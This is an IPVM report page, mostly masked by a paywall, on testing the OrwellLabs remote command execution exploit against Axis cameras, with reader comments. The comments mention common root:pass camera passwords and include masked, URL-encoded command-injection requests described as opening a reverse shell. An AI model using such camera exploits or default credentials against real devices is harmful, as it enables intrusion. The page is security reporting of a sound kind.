Axis OrwellLabs Exploit Tested

Author: IPVM Team, Published on Jul 29, 2016

Another exploit has been reported for Axis cameras (OrwellLabs AXIS Authenticated Remote Command Execution), less than a month after Axis critical security vulnerability.

However, we have tested this exploit and it is not of much practical risk. In this report, we explain how the exploit works, demonstrate it in a video screencast, comment on other security issues and contrast to the Bashis exploit we tested.

******* ******* *** **** ******** *** **** ******* (********** **** ************* ****** ******* *********), **** **** * ***** ********* ******** ******** *************.

*******, ** **** ****** **** ******* *** ** ** *** of **** ********* ****. ** **** ******, ** ******* *** *** exploit *****, *********** ** ** * ***** **********, ******* ** other ******** ****** *** ********** *** ****** ******* ** ******.

[***************]

Summary *******

*** **** ** ***** ** **** ** ******* **** *******, which ****** ******* *** ****** ** *** *******.

***** *** ******* **** ***** ********* ** ********* ********, ** attacker *** ***** *** **** ******** ****** ***** ** **** through ***, ***** ** **** ********* ** **** *****. 

******: ** * ********* *****, *** **** ******* ****** **** defaulted ** ****** ******* / ********** **** *********, **** ***** allow **** ****** **** ***** ** ********* *** ********* ** *** port **** *** *** ** ******* / ********.

*** ******* ****** **** *** **** / ****** *********** ******* of *** **** ****** *** *********.

*** *****

*************, ****** *** ********** ********* **** **** ****** ***, **** is *** ***** ** *** ****** **** ****** ********. ** should **, ** ** ********* ** *** ******** ** **** and ***** ******* **** *********** *** ********.

Exploit ************

*** ***** ***** ***** *** ******* ** ******:

 

Other ******** *****

***** ********* **** ******* * *** ***** ****** **** ******** issues *** ***** ******:

  • ****, ***** **** ******* *** *****, ** ******** ** ******** Axis *********** ******** ** ******** *****. ******** *** **** **** does *** ************* ******* ************ (***** **** ** ** ******) and **** **** ***** ****** ** ***** ******** **** ******** performance problems ** ********* *******.
  • **** **** *** ******* * ****** ****** ** *** *** interface, ***** ** * ****** ******** **** ** *** **** does *** **** **** *** ****** ******* *** ******* **** uses *** ********.
  • **** **** *** ******** ******** ***** ******** ***** ***** **** a ***** *****, ********** ***** ******.

Contrast ** ****** / ****** ****** *******

***** ** *** ****** ********* **** ** *** ********** *******, the****** ****** ****** ****** ********* * ***** ****. *** *** ********** ** **** *** Bashis *** **** *** ******* **************, *.*., ** **** ** you *** ******* ** *** ****** **** * *******, *** do *** **** ** **** **** ******** *** *** *** get **** ******. **** ** * ***** ********** *** * significant **** *** *** *****.

Comments (22)

***** ** ** *** ** ************ ** *** ****** *******, it ***** ** * **** ****** *** ****** **** **** fixed ** ******* *** ** *** *******.

***** ** **** ****** **** * **** ****** **** ****/******* passwords ** **** *** **** **** **** ** ******* *** get ****.

*****'* ** ****** ******* *** *** **** ** **** **** security ********** *** * ***** **'* **** **** ******** ** take ** **** ** *** *** ** *** ***** *************

** *** ******* **** *** *****/**** ********, *** ********* ** a ******* **** ******** *****/**** ********? ********* ***** ** ** is *********** ** "*** ********** ****" ** **** **** **********... try *** ******* ** *** ********** ****, ** **** ****** privileges, **** ***** ****** ****.. *********, ***** **** ****** ** ssh *******...

** ****** **, **** ****** **** "*******" ** *** ********** user **** *** **** *** ** ****, *** ** *****'* work. ** **** * ** ********** **** **** ***** *** recognise **** ** ** "*************" ** ***** ********.

*******, * ** ***** ** **** *** **** **'* * bug, *** ****** ** *****, *** *****... **** ***** ** exploited ** *** ****** ** ** **** ********** ******* **** Axis ****.

***** ***, **** ** ****** "*******" ** ********... ***** ** say, *** *** ** *** ****** **'* **** ***** ******* substance...

*** "*******" ***** ** ******** ** "* **** ****** ** neighbours *******, *** * ****** ** ***** *** *** **** before".

**'* *** ***** ********.

****'* * ******** **** *** ** ********* ***** ***** **** bug.

*** **** **** ** *** **** *** **** ** ****. It's **** **** **** ** *** *** **** *** *** enable ***.

*** **** ******* *** ************ *****'* **** *** ***use ssh remotely. Because the firewall probably isn't open for that port, and changing the port for ssh to 80 would kill the video.

** **** ******* *** ** ****?

All **** ******* **** **** *** ******* ****:**** ********* *** **** ** ****** *** ****** ******* ** *** ********.

*** **** ** ****?

****, ** ****** **** ***** ** ****** ****** ****, ** you **** ** *** ******** **********, ***** * *****:

**** ******* *** ** ********* *** **** * *** ***, as ** ****** *** ** *****.
******** ***** *** ***** ****, ** ** *** ** **** ***...

* *** ***** **** * **** **** ** *** ** practical ***, ** *** ** ***** * ***** ****-*** ***.

**'* ** ****** *******, *** ******** **** ****:**** ************* ** gives *** **** ****** *** ********.

**** ***** ** **** **************** *** ** ****'* ******* *******.

*** **** **** ***** **.

**** *** **** ** *** ***.

*** *** ** **** *** ****.

**** **** *** *** ***.

****'* *** *******?

***

****** **** **, **** ** *** **** **** "*******" *** if *** ******* **** *** *****/********?

***

*** **** **** ** ***** ** ****** *** ******** ** first *****.

***

***, ** ******* *** ** * *** ** ******** ******* doing ********, *** ***** ******** *** *** ** ****** "*******", please *** ****** *** *** *** **** *** ***** ****** with ****/****.

********* *** *******, **'* ******** ********, *** ***'* **** ******** - *** **** ** ** ******** **** ** *** **.

** *** ***** ** "******* ****" *** **** ****** **********, then * ***** *** ********.

*** ***** * ***** **** ** ****** ** *** ****** of *** "*********" ****-************ **** ** ***** *** **** ****** of ******* ********.

** ***** ** ***, * ******** ******* ** ****** *** novel *********** ** ******* ******** ***-******** ******** ******* ******** ** a ******* ***** ** ****** * ******** *************. **** ******** in * **** ******* *** ** ***.

**** ** *** ** ** ********* ** *** *** ********** behaviors ** ****. ******* ** **** **** *** ****** ****, how *** **** ******** *** ******** ** *** ****** ** a *****?

******** **** "******* *** ** ** ****** ******* *****, ** is ***** ********** ****** ******* *********, *** * *** ** reason *** **** ** *** ** *******. ** ***, **** it * *******... :)

** ****** **** ***** ** *** *** ***, *** *** it *** ** ***** *********** ** *** *** **** *** the **** ***** ** ******** ** *** **** ****.

*** *****, *** *** ******* ** ** **** ** ** used.

***

****** **** **, **** ** *** **** **** "*******" *** if *** ******* **** *** *****/********?

******* *** **** *** ********* **** *** ******* * ****** shell ******** ********* ********.

***

*** **** **** ** ***** ** ****** *** ******** ** first *****.

*****. ***** ******** ** ***. ***** ******** ***** *** **choose a password, many for nostalgic reasons choose root:pass. Because it makes it easier for them. This was a brilliant move on Axis part as it allowed them to tout their security but allowed integrators who didn't like it to effectively not use it. After all what's the difference between login in with root:pass or typing pass:pass the first time.

***

***, ** ******* *** ** * *** ** ******** ******* doing ********, *** ***** ******** *** *** ** ****** "*******", please *** ****** *** *** *** **** *** ***** ****** with ****/****.

* **** ** ******** *********, **** *** ****** *****?

*******, * ***** **** **** ** *** * ***** **** just ******* *** ***** ******* * ******* ***** ** **** by ******* *** ***** *** ***** *** ***** ********.*** *** to ****** **** ******* ****, ****** ** *********. *** **** is * **** *** **** *** ********* ** ********* ** VAPIX, ***** ** **** *** ****** ******* ****.

**** **************** ** **** **** ** "********" ** ******.

** *

**'* * ***, ******* ****. *** ***, ** ****** ** fixed.

** ***** ********* *** **** ****** ** ****, *** ********* you ** **** ********* *** *** ******* ******* ** ****** in. **** ****** *******.

*** ******* ********* **** **** ** "*******" **** *** ******* need ** ** **** ** ******* (*.*. *** **** ***** and ******** *** ****) ** *******, ** ***** "***********". **** you *** ****, *** **** ********** ** **** *****, *** you *** ** ******** *** ***** **** **. ******* ***** you. *** **** ****** ******* **** *****. **'* ** ** your ***********.

**'* ******** ******** ** **** **** ** "****" ** **** "vulnerability", **'* ******* **** **** ******* "******" **** *******. ***, there ***** * ***, *** ******* *** ***, *** **** to ** ****. ***** *** *** - ****!

** *** *** ******* **** (***'* *** '****'), ***** ** 'n00b', *** **** '****' ********** **** **** ** ****** "*******", i ***** ***** **** *** ****** - *** ** **'* now, **.. * ** ***. **'* ** ******* *** ****.

**** ** **** **** ** *** * *********** ***** ******* cutting *** ***** **** **** ****** * ******** **** **** port ** ****.

*** **** ****.

**** **** *** ****? **** ***? ** **** **** ** in *** ***?

*** ****, ***** ** **** ** ***** **** *** *** tamper ****, *** ******** /***/******* ** *** **** **/***/***/*******/******/*****-****.******.***** **** ****** ***** **** * ****** ****** ******* **** shell.

***** *** ***** *******, *** ***** ******* ** ** *** in, *** ****** **** ** **** **** *** ** ** Linux ********* ** **** **** ***** *** ********, * **** show *** ** ******* **** *****.

*** *** ** *** ***** *******.

*** ***** *** **** ****** **** "********" ********* ** ********* along *** ***** **:

* ***'* ******* **** **** ******* ******* * **** ****** to **** ******* ** *** ****, ***** ** ******** **** to *** ** *** ***** *****, *** ********* ******* ***** be **** ** ******* *** **** ****** **** ***** *******, even ******* * ******* ****** ******* ********* ***.

***********, * ********* **** ******* **** ********** ******** ** ******* to ******** ** *****, ** ** ***** ** **** ** part ** ******* **** ******** ******* ** *** ****** ** not ********** *** *******.

***** *** ***** *******, *** ***** ******* ** ** *** in, *** ****** **** ** **** **** *** **....

**, ****** ** * ***** ******** *.**, ******* *********, *********** set ** ****:****. ** ******. **** ** ** *********.

*** **** ***** **** *** *'** ******* *** *******... :)

** **** *****, * *** ******* ****:

****://***.***.*.*/***********.*****?***=**********%****%*****.***.*.*%*******%**-*%**/***/**

**** ****** * ****** *****. ***** *** ** ***** ****, but * ***'* ***** *** *** ****** ** ******* **** knowledge ** **** ************.

** *** *** ******** ********** *********** **

*** ****, ***** ** **** ** ***** **** *** *** tamper ****, *** ******** /***/******* ** *** **** **/***/***/*******/******/*****-****.******.***** **** ****** ***** **** * ****** ****** ******* **** shell.

** ***** ** **** *****, ***** ** ** **** ** crontab, *** *** /*** ********** ** **** ****.

******** ***, ** **** ******* ****** ** ** *** *** as ****, ** ***** *** ** *-*** ********… (**** ****** code)

***** **** "**" ***’* **** *** "-*" ******, *** **** instead:

****://***.***.*.*/***********.*****?***=;******%**/***/*;**%**-*%***%*****.***.*.*%*******%***%**/***/*|/***/**%**/***/*%***%**/***/*;**%**/***/*

********** ***** ** ******** ** ****** **** ***** ***** ** code ** /***/****/*****.

# *** /***/****/*****/****.*****


**** ****:

****://***.***.*.*/*****/****.*****?**=***.***.*.*&****=*****

***** **** ** *****'* **** *** -* ******.

*** *** ** **, **'* ****' ****** ******* ** ****.

** *** **** *** ***** ******* ** ** (******* -*) out ***** * ***?

*** ***** ***** *** **** ** * ***** ******.

**, *** ****** *** ***** ** **** *** ** ******* a *******, ******* **** ******** * ****. **'* **** * little ***** *** *** **** *** **** * **** ****?

********, *'* *** ** **** ****** ***..

**, **** * **** ***!

*.*. **** *** **** ***-** * ******* **** ***** **** and * ** *********?

**** ** *** **** **** *** *** **** ******* *** from *** ****** *** **** ** ****** *** *** ****** remotely?

****, * **** *** *** *** ***** **** ******** *** have ** ******** *** ***** ******** ** ***** ********* *** explain *** **** ****** **** ***** ********!

Login to read this IPVM report.
Why do I need to log in?
IPVM conducts unique testing and research funded by member's payments enabling us to offer the most independent, accurate and in-depth information.

Most Recent Industry Reports

SkyBell Trim & Slim Models Tested on Sep 25, 2017
Given continued growth of video doorbells and the central role Skybell plays in smarthome packages like Alarm.com and Honeywell Total Connect, we...
Hackers Globally Attacking Dahua Recorders on Sep 25, 2017
Dahua recorders are being hacked and vandalized around the world, as confirmed by dozens of reports to IPVM since the attacks surged 5 days...
Reseting IP Cameras - 30 Manufacturer Directory on Sep 22, 2017
Every camera has a reset button (well, almost) but it is not always clear what these buttons do, how long they need to be held, what settings they...
80+ OEMs Verified Vulnerable To Hikvision Backdoor on Sep 22, 2017
Over 80 Hikvision OEM partners, including ADI, Interlogix, LTS, and Northern Video, have been verified as having products vulnerable to the...
Genetec Launches Cloud Access Control (Synergis SaaS) on Sep 21, 2017
Genetec's cloud everything expansion continues, with their announcement of Synergis SaaS edition, joining their cloud video offering Stratocast,...
Genetec CEO Warns Against Insider Threats on Sep 21, 2017
With Dahua and Hikvision cybersecurity issues becoming indisputable, a new counter has emerged. Just put them behind a firewall, buy cheap...
New IPVM Calculator V3 Released on Sep 20, 2017
The New IPVM Calculator V3 is released. An entirely new architecture delivers the following benefits: Turbo The calculator is now ~50% faster in...
Automatic Door Operators For Access Tutorial on Sep 20, 2017
Opening and closing doors might sound simple, but it takes a high-tech piece of door hardware to pull it off. Integrating automatic door operators...
'Clowns' Allege Ubiquiti 'Completely Fraudulent' on Sep 20, 2017
A short seller has alleged Ubiquiti is 'completely fraudulent'. Ubiquiti's CEO has responded calling them 'clowns'. Here is the short...
Avigilon 'Blue' Cloud Entry Examined on Sep 19, 2017
Avigilon is moving to the cloud. The company announced their Avigilon Blue platform, designed to be a web-managed surveillance system, utilizing...

The world's leading video surveillance information source, IPVM provides the best reporting, testing and training for 10,000+ members globally. Dedicated to independent and objective information, we uniquely refuse any and all advertisements, sponsorship and consulting from manufacturers.

About | FAQ | Contact